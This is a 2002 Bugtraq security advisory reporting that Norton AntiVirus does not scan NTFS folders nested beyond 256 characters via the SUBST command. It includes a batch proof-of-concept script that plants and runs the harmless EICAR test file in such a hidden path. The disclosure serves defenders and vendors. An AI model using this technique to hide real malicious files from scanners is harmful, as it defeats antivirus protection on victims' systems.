Long path exploit on NTFS
Date: Wed, 30 Jan 2002 09:33:33 +0100
From: hans.somers@nl.abnamro.com
To: bugtraq@securityfocus.com
Subject: Long path exploit on NTFS
>
>
> Long path exploit on NTFS
> =====================
> The filesystem NTFS seems to be a hiding place for virusses if you use a
file path which
> exceeds 256 charaters.
>
> What is the case?
> The filepath (drive + folderpath + filename) theoraticly can take up to
32000 charaters if
> the filesystem in use is NTFS. However, the way in wich Windows NT (4.0,
2000 and
> XP) access this filesystem a maximum of 256 characters is in place. If
you try to go
> deeper, you will experience a "Path too long" error.
> In these Operating System there is a way to substitute a long folderpath,
using
> the "SUBST" command. If you change your current drive to the substituted
drive, the
> pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create
an even deeper
> path.
> Normally this would not alarm anyone, however, i discovered that my
favorite
> virusscanner (Norton AntiVirus) was not able to follow the deep path
where i created the
> EICAR-test string. So i created a very simple batchfile to demonstrate
this exploit.
> My virusscanner will only find this virus is the SUBST drive is availible
during the scan.
>
> I have tested this on the following platforms:
> Windows NT 4.0 SP4
> Windows NT 4.0 SP6a
> Windows 2000 Professional SP2
> Windows XP Pro
> I have determined that the following versions of Norton AntiVirus will
not follow
> the deep path during a complete scan:
> Norton AntiVirus 5.0
> Norton AntiVirus 7.5.1
> Norton Antivirus 8.00.58
>
> I suspect that other virusscanners will encounter the same "bug" so you
might try the
> sample script that i created. Additionally, other tools (quotamanagers,
inventory tools
> etc) that gather information from a NTFS partition might reveal the same
bug.
>
> After running the script below, remove the substituted drive (SUBST Q:
/D) and run a
> full scan on your C-partition. I suspect that the Eicar-virus will not be
found.
> Additionally, re-create the substituted drive and re-run the scan. Under
normal conditions
> the Eicar-virus will be found and removed (depending on your settings).
>
> As far as i can see, there is no real remedy against this exploit. I hope
this message will
> pass through the proper channels, so the responsible parties will act on
this.
>
> Responses on this posting at my address are welcome.
>
>
> Hans Somers (hans.somers@nl.abnamro.com)
>
> Sample script:
> ===========
> @echo off
> cls
> echo Start test-script NTFS-limit
> @echo Create a filepath to the limit of NTFS
> md
> c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
> \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
> 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
> 123456789
> cd
> c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
> \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
> 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
> 123456789
> @echo Create the Eicar test-string for PoC. This should be detected
normally if you
> have an active virusscanner.
> echo
> X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
> >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the Eicar test-string
> copy EICAR.TXT EICAR1.COM >NUL
> @echo Create a subst-drive Q: for this path
> subst Q:
> c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
> \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
> 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
> 123456789
> @echo Create e even deeper filepath (thus exceeding the limit of NTFS's
explorer)
> md Q:\1234567890\1234567890\1234567890
> @echo Change current folder into "the deep"
> Q:
> cd Q:\1234567890\1234567890\1234567890
> @echo Create the Eicar test-string
> echo
> X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
> >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the Eicar test-string
> copy EICAR.TXT EICAR2.COM >NUL
> EICAR2.COM
> echo .
> echo End of test-script
>
>
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change. ABN AMRO
Bank N.V. (including its group companies) shall not be liable for the
improper or incomplete transmission of the information contained in this
communication nor for any delay in its receipt or damage to your system.
ABN AMRO Bank N.V. (or its group companies) does not guarantee that the
integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------
